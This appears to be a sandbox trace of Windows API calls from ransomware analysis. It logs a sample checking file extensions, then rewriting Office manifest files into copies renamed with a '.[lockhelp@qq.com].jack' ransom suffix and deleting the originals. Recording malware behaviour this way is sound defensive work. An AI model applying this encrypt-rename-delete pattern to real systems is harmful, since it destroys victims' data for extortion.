[0203.074] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString=".bz2") returned 4 [0203.074] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString=".7z") returned 3 [0203.074] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString=".dbf") returned 4 [0203.074] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString=".1cd") returned 4 [0203.074] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString=".jpg") returned 4 [0203.074] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.074] lstrlenW (lpString=".doc") returned 4 [0203.074] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString=".docx") returned 5 [0203.074] lstrcmpiW (lpString1=".docx", lpString2="R.XML") returned -1 [0203.074] lstrlenW (lpString=".pdf") returned 4 [0203.074] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0203.074] lstrlenW (lpString=".xls") returned 4 [0203.075] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString=".xlsx") returned 5 [0203.075] lstrcmpiW (lpString1=".xlsx", lpString2="R.XML") returned -1 [0203.075] lstrlenW (lpString=".ppt") returned 4 [0203.075] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.075] lstrlenW (lpString=".zip") returned 4 [0203.075] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0203.075] lstrlenW (lpString=".rar") returned 4 [0203.075] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString=".bz2") returned 4 [0203.075] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString=".7z") returned 3 [0203.075] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0203.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.075] lstrlenW (lpString=".dbf") returned 4 [0203.075] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.075] lstrlenW (lpString=".1cd") returned 4 [0203.075] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0203.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 54 [0203.075] lstrlenW (lpString=".jpg") returned 4 [0203.075] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0203.075] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0203.075] lstrlenW (lpString="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 53 [0203.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0203.916] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1261) returned 1 [0203.990] CloseHandle (hObject=0x3d4) returned 1 [0203.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 0x220 [0203.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0203.990] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0203.990] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0203.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0203.991] GetLastError () returned 0x0 [0203.991] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0204.175] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0204.176] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0204.176] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.176] SetEndOfFile (hFile=0x434) returned 1 [0204.261] CloseHandle (hObject=0x434) returned 1 [0204.264] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.264] SetEndOfFile (hFile=0x3d4) returned 1 [0204.265] CloseHandle (hObject=0x3d4) returned 1 [0204.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 1 [0204.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.266] lstrlenW (lpString=".doc") returned 4 [0204.266] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.266] lstrlenW (lpString=".docx") returned 5 [0204.266] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.266] lstrlenW (lpString=".pdf") returned 4 [0204.266] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.266] lstrlenW (lpString=".xls") returned 4 [0204.266] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.266] lstrlenW (lpString=".xlsx") returned 5 [0204.266] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.266] lstrlenW (lpString=".ppt") returned 4 [0204.266] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.266] lstrlenW (lpString=".zip") returned 4 [0204.266] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.266] lstrlenW (lpString=".rar") returned 4 [0204.266] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.266] lstrlenW (lpString=".bz2") returned 4 [0204.266] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString=".7z") returned 3 [0204.267] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.267] lstrlenW (lpString=".dbf") returned 4 [0204.267] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.267] lstrlenW (lpString=".1cd") returned 4 [0204.267] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.267] lstrlenW (lpString=".jpg") returned 4 [0204.267] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.267] lstrlenW (lpString=".doc") returned 4 [0204.267] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString=".docx") returned 5 [0204.267] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.267] lstrlenW (lpString=".pdf") returned 4 [0204.267] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString=".xls") returned 4 [0204.267] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString=".xlsx") returned 5 [0204.267] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.267] lstrlenW (lpString=".ppt") returned 4 [0204.267] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.268] lstrlenW (lpString=".zip") returned 4 [0204.268] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.268] lstrlenW (lpString=".rar") returned 4 [0204.268] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.268] lstrlenW (lpString=".bz2") returned 4 [0204.268] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.268] lstrlenW (lpString=".7z") returned 3 [0204.268] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.268] lstrlenW (lpString=".dbf") returned 4 [0204.268] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.268] lstrlenW (lpString=".1cd") returned 4 [0204.268] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 104 [0204.268] lstrlenW (lpString=".jpg") returned 4 [0204.268] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.268] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.268] lstrlenW (lpString="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 53 [0204.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.270] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=253712) returned 1 [0204.270] CloseHandle (hObject=0x3d4) returned 1 [0204.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 0x220 [0204.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.270] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.270] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0204.271] GetLastError () returned 0x0 [0204.271] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x3df10, lpOverlapped=0x0) returned 1 [0204.368] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x3df20, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x3df20, lpOverlapped=0x0) returned 1 [0204.372] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0204.372] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.372] SetEndOfFile (hFile=0x434) returned 1 [0204.372] CloseHandle (hObject=0x434) returned 1 [0204.376] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.376] SetEndOfFile (hFile=0x3d4) returned 1 [0204.378] CloseHandle (hObject=0x3d4) returned 1 [0204.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.379] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 1 [0204.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.379] lstrlenW (lpString=".doc") returned 4 [0204.379] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.379] lstrlenW (lpString=".docx") returned 5 [0204.379] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.379] lstrlenW (lpString=".pdf") returned 4 [0204.379] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.379] lstrlenW (lpString=".xls") returned 4 [0204.379] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.379] lstrlenW (lpString=".xlsx") returned 5 [0204.379] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.379] lstrlenW (lpString=".ppt") returned 4 [0204.379] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.379] lstrlenW (lpString=".zip") returned 4 [0204.379] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.379] lstrlenW (lpString=".rar") returned 4 [0204.379] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.379] lstrlenW (lpString=".bz2") returned 4 [0204.379] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".7z") returned 3 [0204.380] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString=".dbf") returned 4 [0204.380] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString=".1cd") returned 4 [0204.380] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString=".jpg") returned 4 [0204.380] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString=".doc") returned 4 [0204.380] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".docx") returned 5 [0204.380] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.380] lstrlenW (lpString=".pdf") returned 4 [0204.380] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".xls") returned 4 [0204.380] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".xlsx") returned 5 [0204.380] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.380] lstrlenW (lpString=".ppt") returned 4 [0204.380] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.380] lstrlenW (lpString=".zip") returned 4 [0204.380] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.380] lstrlenW (lpString=".rar") returned 4 [0204.380] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".bz2") returned 4 [0204.380] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.380] lstrlenW (lpString=".7z") returned 3 [0204.380] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.381] lstrlenW (lpString=".dbf") returned 4 [0204.381] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.381] lstrlenW (lpString=".1cd") returned 4 [0204.381] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0204.381] lstrlenW (lpString=".jpg") returned 4 [0204.381] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.381] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.381] lstrlenW (lpString="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 53 [0204.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.438] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=19451) returned 1 [0204.438] CloseHandle (hObject=0x3d4) returned 1 [0204.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 0x220 [0204.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.439] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.439] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0204.439] GetLastError () returned 0x0 [0204.439] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4bfb, lpOverlapped=0x0) returned 1 [0204.656] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4c00, lpOverlapped=0x0) returned 1 [0204.657] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0204.657] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.657] SetEndOfFile (hFile=0x434) returned 1 [0204.658] CloseHandle (hObject=0x434) returned 1 [0204.659] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.659] SetEndOfFile (hFile=0x3d4) returned 1 [0204.660] CloseHandle (hObject=0x3d4) returned 1 [0204.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 1 [0204.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.661] lstrlenW (lpString=".doc") returned 4 [0204.661] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString=".docx") returned 5 [0204.661] 